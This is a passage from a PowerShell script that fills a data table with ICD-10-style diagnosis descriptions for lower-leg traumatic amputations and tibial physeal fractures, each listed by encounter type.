$DiagnosisList.Rows.Add("Complete traumatic amputation of left lower leg, level unspecified","Complete traumatic amputation of left lower leg, level unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of unspecified lower leg, level unspecified","Complete traumatic amputation of unspecified lower leg, level unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of unspecified lower leg, level unspecified","Complete traumatic amputation of unspecified lower leg, level unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of unspecified lower leg, level unspecified","Complete traumatic amputation of unspecified lower leg, level unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of right lower leg, level unspecified","Partial traumatic amputation of right lower leg, level unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of right lower leg, level unspecified","Partial traumatic amputation of right lower leg, level unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of right lower leg, level unspecified","Partial traumatic amputation of right lower leg, level unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of left lower leg, level unspecified","Partial traumatic amputation of left lower leg, level unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of left lower leg, level unspecified","Partial traumatic amputation of left lower leg, level unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of left lower leg, level unspecified","Partial traumatic amputation of left lower leg, level unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of unspecified lower leg, level unspecified","Partial traumatic amputation of unspecified lower leg, level unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of unspecified lower leg, level unspecified","Partial traumatic amputation of unspecified lower leg, level unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of unspecified lower leg, level unspecified","Partial traumatic amputation of unspecified lower leg, level unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of right tibia","Unspecified physeal fracture of upper end of right tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of right tibia","Unspecified physeal fracture of upper end of right tibia, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of right tibia","Unspecified physeal fracture of upper end of right tibia, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of right tibia","Unspecified physeal fracture of upper end of right tibia, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of right tibia","Unspecified physeal fracture of upper end of right tibia, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of right tibia","Unspecified physeal fracture of upper end of right tibia, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of left tibia","Unspecified physeal fracture of upper end of left tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of left tibia","Unspecified physeal fracture of upper end of left tibia, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of left tibia","Unspecified physeal fracture of upper end of left tibia, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of left tibia","Unspecified physeal fracture of upper end of left tibia, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of left tibia","Unspecified physeal fracture of upper end of left tibia, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of left tibia","Unspecified physeal fracture of upper end of left tibia, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of unspecified tibia","Unspecified physeal fracture of upper end of unspecified tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of unspecified tibia","Unspecified physeal fracture of upper end of unspecified tibia, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of unspecified tibia","Unspecified physeal fracture of upper end of unspecified tibia, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of unspecified tibia","Unspecified physeal fracture of upper end of unspecified tibia, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of unspecified tibia","Unspecified physeal fracture of upper end of unspecified tibia, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of unspecified tibia","Unspecified physeal fracture of upper end of unspecified tibia, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of right tibia","Salter-Harris Type I physeal fracture of upper end of right tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of right tibia","Salter-Harris Type I physeal fracture of upper end of right tibia, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of right tibia","Salter-Harris Type I physeal fracture of upper end of right tibia, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of right tibia","Salter-Harris Type I physeal fracture of upper end of right tibia, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of right tibia","Salter-Harris Type I physeal fracture of upper end of right tibia, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of right tibia","Salter-Harris Type I physeal fracture of upper end of right tibia, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of left tibia","Salter-Harris Type I physeal fracture of upper end of left tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of left tibia","Salter-Harris Type I physeal fracture of upper end of left tibia, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of left tibia","Salter-Harris Type I physeal fracture of upper end of left tibia, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of left tibia","Salter-Harris Type I physeal fracture of upper end of left tibia, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of left tibia","Salter-Harris Type I physeal fracture of upper end of left tibia, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of left tibia","Salter-Harris Type I physeal fracture of upper end of left tibia, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of unspecified tibia","Salter-Harris Type I physeal fracture of upper end of unspecified tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of unspecified tibia","Salter-Harris Type I physeal fracture of upper end of unspecified tibia, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of unspecified tibia","Salter-Harris Type I physeal fracture of upper end of unspecified tibia, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of unspecified tibia","Salter-Harris Type I physeal fracture of upper end of unspecified tibia, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of unspecified tibia","Salter-Harris Type I physeal fracture of upper end of unspecified tibia, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of unspecified tibia","Salter-Harris Type I physeal fracture of upper end of unspecified tibia, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of upper end of right tibia","Salter-Harris Type II physeal fracture of upper end of right tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of upper end of right tibia","Salter-Harris Type II physeal fracture of upper end of right tibia, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of upper end of right tibia","Salter-Harris Type II physeal fracture of upper end of right tibia, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of upper end of right tibia","Salter-Harris Type II physeal fracture of upper end of right tibia, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of upper end of right tibia","Salter-Harris Type II physeal fracture of upper end of right tibia, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of upper end of right tibia","Salter-Harris Type II physeal fracture of upper end of right tibia, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of upper end of left tibia","Salter-Harris Type II physeal fracture of upper end of left tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of upper end of left tibia","Salter-Harris Type II physeal fracture of upper end of left tibia, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of upper end of left tibia","Salter-Harris Type II physeal fracture of upper end of left tibia, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of upper end of left tibia","Salter-Harris Type II physeal fracture of upper end of left tibia, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of upper end of left tibia","Salter-Harris Type II physeal fracture of upper end of left tibia, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of upper end of left tibia","Salter-Harris Type II physeal fracture of upper end of left tibia, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of upper end of unspecified tibia","Salter-Harris Type II physeal fracture of upper end of unspecified tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of upper end of unspecified tibia","Salter-Harris Type II physeal fracture of upper end of unspecified tibia, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of upper end of unspecified tibia","Salter-Harris Type II physeal fracture of upper end of unspecified tibia, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of upper end of unspecified tibia","Salter-Harris Type II physeal fracture of upper end of unspecified tibia, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of upper end of unspecified tibia","Salter-Harris Type II physeal fracture of upper end of unspecified tibia, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of upper end of unspecified tibia","Salter-Harris Type II physeal fracture of upper end of unspecified tibia, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of upper end of right tibia","Salter-Harris Type III physeal fracture of upper end of right tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of upper end of right tibia","Salter-Harris Type III physeal fracture of upper end of right tibia, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of upper end of right tibia","Salter-Harris Type III physeal fracture of upper end of right tibia, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of upper end of right tibia","Salter-Harris Type III physeal fracture of upper end of right tibia, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of upper end of right tibia","Salter-Harris Type III physeal fracture of upper end of right tibia, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of upper end of right tibia","Salter-Harris Type III physeal fracture of upper end of right tibia, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of upper end of left tibia","Salter-Harris Type III physeal fracture of upper end of left tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of upper end of left tibia","Salter-Harris Type III physeal fracture of upper end of left tibia, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of upper end of left tibia","Salter-Harris Type III physeal fracture of upper end of left tibia, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of upper end of left tibia","Salter-Harris Type III physeal fracture of upper end of left tibia, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of upper end of left tibia","Salter-Harris Type III physeal fracture of upper end of left tibia, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of upper end of left tibia","Salter-Harris Type III physeal fracture of upper end of left tibia, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of upper end of unspecified tibia","Salter-Harris Type III physeal fracture of upper end of unspecified tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of upper end of unspecified tibia","Salter-Harris Type III physeal fracture of upper end of unspecified tibia, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of upper end of unspecified tibia","Salter-Harris Type III physeal fracture of upper end of unspecified tibia, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of upper end of unspecified tibia","Salter-Harris Type III physeal fracture of upper end of unspecified tibia, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of upper end of unspecified tibia","Salter-Harris Type III physeal fracture of upper end of unspecified tibia, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of upper end of unspecified tibia","Salter-Harris Type III physeal fracture of upper end of unspecified tibia, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of upper end of right tibia","Salter-Harris Type IV physeal fracture of upper end of right tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of upper end of right tibia","Salter-Harris Type IV physeal fracture of upper end of right tibia, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of upper end of right tibia","Salter-Harris Type IV physeal fracture of upper end of right tibia, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of upper end of right tibia","Salter-Harris Type IV physeal fracture of upper end of right tibia, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of upper end of right tibia","Salter-Harris Type IV physeal fracture of upper end of right tibia, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of upper end of right tibia","Salter-Harris Type IV physeal fracture of upper end of right tibia, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of upper end of left tibia","Salter-Harris Type IV physeal fracture of upper end of left tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of upper end of left tibia","Salter-Harris Type IV physeal fracture of upper end of left tibia, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of upper end of left tibia","Salter-Harris Type IV physeal fracture of upper end of left tibia, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of upper end of left tibia","Salter-Harris Type IV physeal fracture of upper end of left tibia, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of upper end of left tibia","Salter-Harris Type IV physeal fracture of upper end of left tibia, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of upper end of left tibia","Salter-Harris Type IV physeal fracture of upper end of left tibia, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of upper end of unspecified tibia","Salter-Harris Type IV physeal fracture of upper end of unspecified tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of upper end of unspecified tibia","Salter-Harris Type IV physeal fracture of upper end of unspecified tibia, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of upper end of unspecified tibia","Salter-Harris Type IV physeal fracture of upper end of unspecified tibia, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of upper end of unspecified tibia","Salter-Harris Type IV physeal fracture of upper end of unspecified tibia, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of upper end of unspecified tibia","Salter-Harris Type IV physeal fracture of upper end of unspecified tibia, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of upper end of unspecified tibia","Salter-Harris Type IV physeal fracture of upper end of unspecified tibia, sequela") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of right tibia","Other physeal fracture of upper end of right tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of right tibia","Other physeal fracture of upper end of right tibia, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of right tibia","Other physeal fracture of upper end of right tibia, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of right tibia","Other physeal fracture of upper end of right tibia, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of right tibia","Other physeal fracture of upper end of right tibia, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of right tibia","Other physeal fracture of upper end of right tibia, sequela") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of left tibia","Other physeal fracture of upper end of left tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of left tibia","Other physeal fracture of upper end of left tibia, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of left tibia","Other physeal fracture of upper end of left tibia, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of left tibia","Other physeal fracture of upper end of left tibia, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of left tibia","Other physeal fracture of upper end of left tibia, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of left tibia","Other physeal fracture of upper end of left tibia, sequela") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of unspecified tibia","Other physeal fracture of upper end of unspecified tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of unspecified tibia","Other physeal fracture of upper end of unspecified tibia, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of unspecified tibia","Other physeal fracture of upper end of unspecified tibia, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of unspecified tibia","Other physeal fracture of upper end of unspecified tibia, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of unspecified tibia","Other physeal fracture of upper end of unspecified tibia, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of unspecified tibia","Other physeal fracture of upper end of unspecified tibia, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of right tibia","Unspecified physeal fracture of lower end of right tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of right tibia","Unspecified physeal fracture of lower end of right tibia, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of right tibia","Unspecified physeal fracture of lower end of right tibia, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of right tibia","Unspecified physeal fracture of lower end of right tibia, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of right tibia","Unspecified physeal fracture of lower end of right tibia, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of right tibia","Unspecified physeal fracture of lower end of right tibia, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of left tibia","Unspecified physeal fracture of lower end of left tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of left tibia","Unspecified physeal fracture of lower end of left tibia, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of left tibia","Unspecified physeal fracture of lower end of left tibia, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of left tibia","Unspecified physeal fracture of lower end of left tibia, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of left tibia","Unspecified physeal fracture of lower end of left tibia, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of left tibia","Unspecified physeal fracture of lower end of left tibia, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of unspecified tibia","Unspecified physeal fracture of lower end of unspecified tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of unspecified tibia","Unspecified physeal fracture of lower end of unspecified tibia, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of unspecified tibia","Unspecified physeal fracture of lower end of unspecified tibia, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of unspecified tibia","Unspecified physeal fracture of lower end of unspecified tibia, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of unspecified tibia","Unspecified physeal fracture of lower end of unspecified tibia, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of unspecified tibia","Unspecified physeal fracture of lower end of unspecified tibia, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of right tibia","Salter-Harris Type I physeal fracture of lower end of right tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of right tibia","Salter-Harris Type I physeal fracture of lower end of right tibia, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of right tibia","Salter-Harris Type I physeal fracture of lower end of right tibia, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of right tibia","Salter-Harris Type I physeal fracture of lower end of right tibia, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of right tibia","Salter-Harris Type I physeal fracture of lower end of right tibia, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of right tibia","Salter-Harris Type I physeal fracture of lower end of right tibia, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of left tibia","Salter-Harris Type I physeal fracture of lower end of left tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of left tibia","Salter-Harris Type I physeal fracture of lower end of left tibia, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of left tibia","Salter-Harris Type I physeal fracture of lower end of left tibia, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of left tibia","Salter-Harris Type I physeal fracture of lower end of left tibia, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of left tibia","Salter-Harris Type I physeal fracture of lower end of left tibia, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of left tibia","Salter-Harris Type I physeal fracture of lower end of left tibia, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of unspecified tibia","Salter-Harris Type I physeal fracture of lower end of unspecified tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of unspecified tibia","Salter-Harris Type I physeal fracture of lower end of unspecified tibia, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of unspecified tibia","Salter-Harris Type I physeal fracture of lower end of unspecified tibia, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of unspecified tibia","Salter-Harris Type I physeal fracture of lower end of unspecified tibia, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of unspecified tibia","Salter-Harris Type I physeal fracture of lower end of unspecified tibia, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of unspecified tibia","Salter-Harris Type I physeal fracture of lower end of unspecified tibia, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of right tibia","Salter-Harris Type II physeal fracture of lower end of right tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of right tibia","Salter-Harris Type II physeal fracture of lower end of right tibia, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of right tibia","Salter-Harris Type II physeal fracture of lower end of right tibia, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of right tibia","Salter-Harris Type II physeal fracture of lower end of right tibia, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of right tibia","Salter-Harris Type II physeal fracture of lower end of right tibia, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of right tibia","Salter-Harris Type II physeal fracture of lower end of right tibia, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of left tibia","Salter-Harris Type II physeal fracture of lower end of left tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of left tibia","Salter-Harris Type II physeal fracture of lower end of left tibia, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of left tibia","Salter-Harris Type II physeal fracture of lower end of left tibia, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of left tibia","Salter-Harris Type II physeal fracture of lower end of left tibia, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of left tibia","Salter-Harris Type II physeal fracture of lower end of left tibia, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of left tibia","Salter-Harris Type II physeal fracture of lower end of left tibia, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of unspecified tibia","Salter-Harris Type II physeal fracture of lower end of unspecified tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of unspecified tibia","Salter-Harris Type II physeal fracture of lower end of unspecified tibia, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of unspecified tibia","Salter-Harris Type II physeal fracture of lower end of unspecified tibia, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of unspecified tibia","Salter-Harris Type II physeal fracture of lower end of unspecified tibia, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of unspecified tibia","Salter-Harris Type II physeal fracture of lower end of unspecified tibia, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of unspecified tibia","Salter-Harris Type II physeal fracture of lower end of unspecified tibia, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of right tibia","Salter-Harris Type III physeal fracture of lower end of right tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of right tibia","Salter-Harris Type III physeal fracture of lower end of right tibia, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of right tibia","Salter-Harris Type III physeal fracture of lower end of right tibia, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of right tibia","Salter-Harris Type III physeal fracture of lower end of right tibia, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of 